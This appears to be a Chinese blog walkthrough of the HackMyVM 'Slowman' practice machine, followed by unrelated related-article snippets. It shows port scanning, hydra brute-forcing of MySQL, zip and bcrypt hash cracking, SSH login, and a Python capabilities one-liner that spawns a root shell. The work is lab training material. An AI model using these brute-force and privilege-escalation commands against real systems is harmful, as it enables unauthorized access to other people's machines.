HackMyVM-Slowman

news2024/12/26 3:47:08


目录

信息收集

arp

nmap

whatweb

WEB

web信息收集

gobuster

FTP匿名登录

hydra mysql爆破

mysql登录

fcrackzip爆破

hashcat爆破

ssh登录

提权

系统信息收集

python Capabilities提权


信息收集

arp
┌──(root㉿0x00)-[~/HackMyVM]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:9d:6d:7b, IPv4: 192.168.9.183
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.9.184   08:00:27:a5:5a:f3       PCS Systemtechnik GmbH

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.025 seconds (126.42 hosts/sec). 6 responded


nmap
端口探测

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -p- 192.168.9.184 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-06 08:28 CST
Nmap scan report for 192.168.9.184
Host is up (0.00038s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
80/tcp   open   http
3306/tcp open   mysql
MAC Address: 08:00:27:A5:5A:F3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds
服务版本信息收集

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -sC -sV -O -p 20,21,22,80,3306 192.168.9.184 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-06 08:30 CST
Nmap scan report for 192.168.9.184
Host is up (0.00052s latency).

PORT     STATE  SERVICE  VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp      vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.9.183
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp   open   ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 02:d6:5e:01:45:5b:8d:2d:f9:cb:0b:df:45:67:04:22 (ECDSA)
|_  256 f9:ce:4a:75:07:d0:05:1d:fb:a7:a7:69:39:1b:08:10 (ED25519)
80/tcp   open   http     Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Fastgym
|_http-server-header: Apache/2.4.52 (Ubuntu)
3306/tcp open   mysql    MySQL 8.0.35-0ubuntu0.22.04.1
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.35-0ubuntu0.22.04.1
|   Thread ID: 9
|   Capabilities flags: 65535
|   Some Capabilities: InteractiveClient, SupportsLoadDataLocal, ConnectWithDatabase, SupportsCompression, ODBCClient, Speaks41ProtocolOld, SupportsTransactions, LongPassword, IgnoreSigpipes, LongColumnFlag, Support41Auth, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SwitchToSSLAfterHandshake, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: CT+4mB\x01(\x17KW.L&L\x1AG2\x16>
|_  Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.35_Auto_Generated_Server_Certificate
| Not valid before: 2023-11-22T19:44:52
|_Not valid after:  2033-11-19T19:44:52
MAC Address: 08:00:27:A5:5A:F3 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.21 seconds



whatweb
┌──(root㉿0x00)-[~/Desktop]
└─# whatweb -v http://192.168.9.184/
WhatWeb report for http://192.168.9.184/
Status    : 200 OK
Title     : Fastgym
IP        : 192.168.9.184
Country   : RESERVED, ZZ

Summary   : Apache[2.4.52], Bootstrap, Email[slowman@gmail.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], JQuery[3.4.1], Script, X-UA-Compatible[IE=edge]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.52 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ Email ]
        Extract email addresses. Find valid email address and 
        syntactically invalid email addresses from mailto: link 
        tags. We match syntactically invalid links containing 
        mailto: to catch anti-spam email addresses, eg. bob at 
        gmail.com. This uses the simplified email regular 
        expression from 
        http://www.regular-expressions.info/email.html for valid 
        email address matching. 

        String       : slowman@gmail.com

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : Apache/2.4.52 (Ubuntu) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Version      : 3.4.1
        Website     : http://jquery.com/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the 
        HTTP header and meta http-equiv tag. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc817574.aspx 

        String       : IE=edge

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 06 May 2024 00:35:38 GMT
        Server: Apache/2.4.52 (Ubuntu)
        Last-Modified: Thu, 23 Nov 2023 19:17:30 GMT
        ETag: "402e-60ad6afe32cc0-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2478
        Connection: close
        Content-Type: text/html


WEB

web信息收集


gobuster
┌──(root㉿0x00)-[~/HackMyVM]
└─# gobuster dir -u http://192.168.9.184/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.184/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://192.168.9.184/images/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.9.184/css/]
/js                   (Status: 301) [Size: 311] [--> http://192.168.9.184/js/]
/server-status        (Status: 403) [Size: 278]
Progress: 220547 / 220548 (100.00%)
===============================================================
Finished
===============================================================


FTP匿名登录

虽然可以匿名登录进入,但是使用命令的话,会卡在这!

我去搜索了一下资料:

在FTP通信中,数据传输有两种模式:主动模式和被动模式。在被动模式下,FTP服务器会在端口20上监听数据连接,而客户端在端口21上发送命令。
当使用被动模式时,服务器会向客户端提示"Entering Passive Mode",并提供一个端口号,客户端通过该端口与服务器建立数据连接来传输文件列表等信息。

由于被动模式下每次数据连接都是单独的,因此每次执行"ls"命令时,FTP服务器会重新发送"Entering Passive Mode"消息,并为该次数据传输提供一个新的端口号。
这就是为什么在你的情况下,两次执行"ls"命令时都有重新进入被动模式的提示。

所以说,不要急,一会就出来了!

把文件下载到本地!

看样子应该是mysql的账号,或者密码??

我们先作为账号爆破一下!

hydra mysql爆破
┌──(root㉿0x00)-[~/HackMyVM]
└─# hydra -l trainerjeff -P /usr/share/wordlists/rockyou.txt mysql://192.168.9.184
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-06 09:00:24
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.9.184:3306/
[3306][mysql] host: 192.168.9.184   login: trainerjeff   password: soccer1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-06 09:00:29

账号:trainerjeff
密码:soccer1

mysql登录
┌──(root㉿0x00)-[~/HackMyVM]
└─# mysql -h 192.168.9.184 -u trainerjeff -p      
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 2131
Server version: 8.0.35-0ubuntu0.22.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| trainers_db        |
+--------------------+
5 rows in set (0.005 sec)

MySQL [(none)]> 

得到:

+----+-----------------+-------------------------------+
| id | user            | password                      |
+----+-----------------+-------------------------------+
|  1 | gonzalo         | tH1sS2stH3g0nz4l0pAsSWW0rDD!! |
|  2 | $SECRETLOGINURL | /secretLOGIN/login.html       |
+----+-----------------+-------------------------------+

/secretLOGIN/login.html

这个应该是登录的目录!

不出意外,我们需要使用id1用户进行登录!

把压缩包下载到本地!
┌──(root㉿0x00)-[~/HackMyVM]
└─# unzip credentials.zip 
Archive:  credentials.zip
[credentials.zip] passwords.txt password: 
password incorrect--reenter: 
password incorrect--reenter: 
zsh: suspended  unzip credentials.zip


解压需要密码??

fcrackzip爆破

解压密码是 spongebob1

得到一个密码,应该就是ssh的!不过我们还得先爆破一下!

----------
$USERS: trainerjean

$PASSWORD: $2y$10$DBFBehmbO6ktnyGyAtQZNeV/kiNAE.Y3He8cJsvpRxIFEhRAUe1kq 
---------


hashcat爆破
┌──(root㉿0x00)-[~/HackMyVM]
└─# echo '$2y$10$DBFBehmbO6ktnyGyAtQZNeV/kiNAE.Y3He8cJsvpRxIFEhRAUe1kq' > pass_hash.list



┌──(root㉿0x00)-[~/HackMyVM]
└─# hashcat -a 0 -m 3200 --force pass_hash.list /usr/share/wordlists/rockyou.txt

有linux经验的应该不难判断出密码的加密类型!

ssh登录
user:trainerjean
pass:tweety1


提权

系统信息收集
trainerjean@slowman:~$ cat /etc/passwd | grep home | grep -v "nologin"
trainerjeff:x:1001:1001:trainerjeff,,,:/home/trainerjeff:/bin/bash
trainerjean:x:1002:1002:trainerjean,,,:/home/trainerjean:/bin/bash
gonzalo:x:1003:1003:gonzalo,,,:/home/gonzalo:/bin/bash

trainerjean@slowman:/home$ find / -perm -u=s -type f 2>/dev/null
/snap/core20/2264/usr/bin/chfn
/snap/core20/2264/usr/bin/chsh
/snap/core20/2264/usr/bin/gpasswd
/snap/core20/2264/usr/bin/mount
/snap/core20/2264/usr/bin/newgrp
/snap/core20/2264/usr/bin/passwd
/snap/core20/2264/usr/bin/su
/snap/core20/2264/usr/bin/sudo
/snap/core20/2264/usr/bin/umount
/snap/core20/2264/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2264/usr/lib/openssh/ssh-keysign
/snap/core20/2015/usr/bin/chfn
/snap/core20/2015/usr/bin/chsh
/snap/core20/2015/usr/bin/gpasswd
/snap/core20/2015/usr/bin/mount
/snap/core20/2015/usr/bin/newgrp
/snap/core20/2015/usr/bin/passwd
/snap/core20/2015/usr/bin/su
/snap/core20/2015/usr/bin/sudo
/snap/core20/2015/usr/bin/umount
/snap/core20/2015/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2015/usr/lib/openssh/ssh-keysign
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/snapd/20290/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/bin/mount
/usr/bin/su
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/umount
/usr/libexec/polkit-agent-helper-1

trainerjean@slowman:/tmp$ uname -a
Linux slowman 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
trainerjean@slowman:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy

上传扫描脚本查看一下!

这里的python有capabilities权限??

可以利用一下!


python Capabilities提权
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1653477.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

有哪些渠道找到海外代理IP服务?

在今天的全球化时代,许多企业和个人都需要跨越国界,与世界各地的资源、信息和市场进行连接。海外代理IP服务成跨境在线业务增效的重要的工具,可以帮助拓展业务宽度,以实现更多样化的业务需求。但是,如何找到合适、安全…

华为数据之道第四部分导读

目录 导读 第四部分 第10章 未来已来:数据成为企业核心竞争力 数据:新的生产要素 数据被列为生产要素:制度层面的肯定 数据将进入企业的资产负债表 数据资产的价值由市场决定 大规模数据交互的企业数据生态 数据生态离不开底层技术的…

STM32使用ADC单/多通道检测数据

文章目录 1. STM32单片机ADC功能详解 2. AD单通道 2.1 初始化 2.2 ADC.c 2.3 ADC.h 2.4 main.c 3. AD多通道 3.1 ADC.c 3.2 ADC.h 3.3 main.c 3.4 完整工程文件 1. STM32单片机ADC功能详解 STM32单片机ADC功能详解 2. AD单通道 这个代码实现通过ADC功能采集三脚电…

回答篇:测试开发高频面试题目

引用之前文章:《测试开发高频面试题目》 https://blog.csdn.net/qq_41214208/article/details/138193469?spm1001.2014.3001.5502 本篇文章是回答篇(持续更新中) 1. 什么是测试开发以及其在软件开发流程中的作用。 a. 测试开发是指测试人员或…

MySQL LRU算法(冷热数据分离)

背景 MySQL中使用的InnoDB存储引擎采用了一种特别的最近最少使用(LRU, Least Recently Used)算法来管理其Buffer Pool中的页(包括数据页和索引页)。Buffer Pool是InnoDB用来缓存数据,以减少磁盘I/O操作的内存区域。正…

Kafk设计篇01(设计动机+持久化)

背景 本篇文章基于最新版本:kafka 3.7,其他版本的设计,请参考官网: https://kafka.apache.org/documentation/设计动机 任何组件都有它存在的必要,必然是要解决某一类问题的。我们来看看kafka设计的初衷如何。 kaf…

ICLR 2024 杰出论文奖揭晓!两篇国内论文获荣誉提名

国际学习表征会议( International Conference on Learning Representations,简称ICLR),于5月7日至11日在奥地利维也纳展览会议中心举行。 ICLR与NeurIPS(Conference on Neural Information Processing Systems&#x…

[笔试训练](十六)

目录 046:字符串替换 047:神奇数 048:DNA序列 046:字符串替换 字符串替换_牛客题霸_牛客网 (nowcoder.com) 题目&#xff1a; 题解&#xff1a; 简单模拟题~ class StringFormat { public:string formatString(string str, int n, vector<char> arg, int m) {strin…

紫外激光打标机适合在哪些材料表面进行标记

紫外激光打标机适合在多种材料表面进行标记&#xff0c;特别是那些对热敏感或者需要高精度、高清晰度标记的材料。以下是一些常见的适用材料&#xff1a; 1. 塑料&#xff1a;紫外激光打标机在塑料材料上表现尤为出色&#xff0c;因为紫外激光的短波长和高能量密度使得它能够在…

Konga域名配置多个路由

云原生API网关-Kong部署与konga基本使用 Nginx server{listen 443 ssl;location / {proxy_pass http://127.0.0.1:8100;}location /openApi {proxy_pass http://172.31.233.35:7100/openApi;} } Kong {"id": "f880b21c-f7e0-43d7-a2a9-221fe86d9231&q…

【Qt 学习笔记】Qt常用控件 | 输入类控件 | Dial的使用及说明

博客主页&#xff1a;Duck Bro 博客主页系列专栏&#xff1a;Qt 专栏关注博主&#xff0c;后期持续更新系列文章如果有错误感谢请大家批评指出&#xff0c;及时修改感谢大家点赞&#x1f44d;收藏⭐评论✍ Qt常用控件 | 输入类控件 | Dial的使用及说明 文章编号&#xff1a;Qt…

ios苹果App上架到应用商店的操作流程

哈喽&#xff0c;大家好呀&#xff0c;淼淼又来和大家见面啦&#xff0c;发现最近有许多想要上架App的小伙伴&#xff0c;但是又不知道要怎么操作&#xff0c;对于开发者而言&#xff0c;将精心打造的iOS应用程序成功上架到苹果的 App Store 是向全球用户展示咱们的产品和服务的…

Qwen大模型实践之量化

Qwen大模型实践之量化 接上篇内容。 1. AutoGPTQ量化 提供了基于AutoGPTQ的量化方案&#xff0c;并开源了Int4和Int8量化模型。量化模型的效果损失很小&#xff0c;但能显著降低显存占用并提升推理速度。 以下我们提供示例说明如何使用Int4量化模型。在开始使用前&#xff0c;请…

第十三届蓝桥杯决赛(国赛)真题 Java B 组【原卷】

文章目录 发现宝藏【考生须知】试题 A: 重合次数试题 B: 数数试题 C: 左移右移试题 D: 窗口试题 E: 迷宫试题 F : \mathrm{F}: F: 小球称重试题 G: 背包与魔法试题 H: 修路试题 I: 围栏试题J: 好数 发现宝藏 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&…

暗区突围PC测试资格获取 Twitch老鼠台一键领取测试资格教程

Twitch平台&#xff0c;这个广受欢迎的直播巨头&#xff0c;不仅是游戏文化的直播聚集地&#xff0c;还常与各类游戏携手合作&#xff0c;为观众带来独特的互动体验&#xff0c;观看直播即可解锁游戏内奖励。正值热门游戏《暗区突围》PC版测试阶段&#xff0c;Twitch再次发力&a…

Python-100-Days: Day09 Object-oriented programming(OOP) Upgrade

1.property装饰器 之前有讨论过&#xff0c; Python中属性和方法访问权限的问题&#xff0c;不建议将属性设置为私有的&#xff0c;倘若直接将属性暴露给外界也是存在问题的。例如&#xff0c;我们没有办法检查赋给属性的值是否有效。之前的建议是将属性命名以单下划线开头&am…

SQL奇难怪状知识点分享

SQL执行顺序 select 语句的完整结构&#xff1a; select 去重 要查询的字段 from表&#xff08;注意&#xff1a;表和字段可以取别名&#xff09; xxxx&#xff08;left/right/full&#xff09; join 要连接的表 on 等值判断&#xff08;顺序&#xff1a;先on再where&#x…

win10安装.NET Framework 3.5(包括.net2.0和3.0)

打开控制面板 选择”程序” 点击”启用或关闭Windows功能“ 把.NET Framework 3.5选项勾选即可&#xff0c;若没有下载的&#xff0c;下载即可。 PS:如果下载过程出错&#xff0c;按如下流程&#xff1a; 右击”此电脑”选择“管理”&#xff0c;找到“服务和应用程序”&#x…

C++之初阶模板

个人主页&#xff1a;救赎小恶魔 欢迎大家来到小恶魔频道 好久不见&#xff0c;甚是想念 今天我们要深入讲述C内存管理 目录 引言&#xff1a; 模板 1. 泛型编程 2. 模板函数 2.1函数模板的原理 2.2模板函数的实例化 2.3函数模板的匹配 3.类模板 STL STL 的主要组…

2024副业指南:年轻人热捧的七大赚钱副业,在家就能做!做得好的月入过万了

副业&#xff0c;听起来就像是在主业之外的“小打小闹”&#xff0c;但你知道吗&#xff1f;很多人通过副业实现了财务自由&#xff0c;甚至有的人副业收入超过了主业&#xff01; 今天&#xff0c;就让我们一起探索那些适合你的副业机会&#xff0c;让你在工作之余也能成为收入…